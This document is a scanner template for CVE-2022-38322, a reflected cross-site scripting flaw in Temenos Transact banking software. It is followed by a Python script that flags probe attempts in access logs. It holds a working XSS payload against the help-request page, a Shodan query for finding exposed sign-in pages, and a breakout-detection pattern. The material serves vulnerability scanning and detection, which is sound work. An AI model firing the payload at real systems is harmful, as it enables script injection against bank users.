Vulnerability Description
Multiple vulnerabilities in Temenos Transact (formerly T24) allow reflected cross-site scripting (XSS) attacks.
id: CVE-2022-38322

info:
  name: Temenos Transact - Cross-Site Scripting
  author: qotoz
  severity: high
  description: |
    Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
  reference:
    - https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"transact sign in","t24 sign in"
  tags: cve,cve2022,temenos,transact,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - setupHelp('')" onerror="confirm('document.domain')

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a00463044022044a928b1c5b76a54f8948d8d6487ab459238c1a7578661817e0537117165072f02205705e33889a92fd7fe57038a373ec7c5153974e4b8273a37c2b21a0ea60f9c0d:922c64590222798bb761d5b6d8e72950
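
Added example (not part of the original template or the referenced write-up): a log review check that flags requests to /jsps/helprequest.jsp whose url parameter carries characters able to break out of the quoted setupHelp('...') context shown in the body matcher. The log lines are constructed samples in combined log format, and the function and constant names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2024:10:00:01 +0000] "GET /jsps/helprequest.jsp?url=help/overview.htm HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Mar/2024:10:00:05 +0000] "GET /jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22 HTTP/1.1" 200 901 "-" "probe"',
    '198.51.100.9 - - [01/Mar/2024:10:00:09 +0000] "GET /JSPS/HelpRequest.jsp?url=%2527)%2522+onerror%3D HTTP/1.1" 200 890 "-" "probe"',
    '198.51.100.3 - - [01/Mar/2024:10:00:12 +0000] "GET /index.jsp?url=%22x HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TARGET_PATH = "/jsps/helprequest.jsp"  # endpoint named in the template
# Characters that let a value leave a quoted JavaScript string or HTML attribute,
# plus inline event-handler attributes such as onerror=.
BREAKOUT_RE = re.compile(r"""['"<>]|\bon\w+\s*=""", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_help_requests(lines):
    """Return (client_ip, decoded url value) for requests carrying breakout characters."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        # Compare case-insensitively; some deployments resolve paths that way.
        if target.path.lower() != TARGET_PATH:
            continue
        for raw in parse_qs(target.query, keep_blank_values=True).get("url", []):
            value = fully_decode(raw)
            if BREAKOUT_RE.search(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_help_requests(SAMPLE_LOG):
        print(ip, repr(value))
```

A hit only shows that the request was received; whether the instance reflected the value unencoded is what the template's body matcher checks.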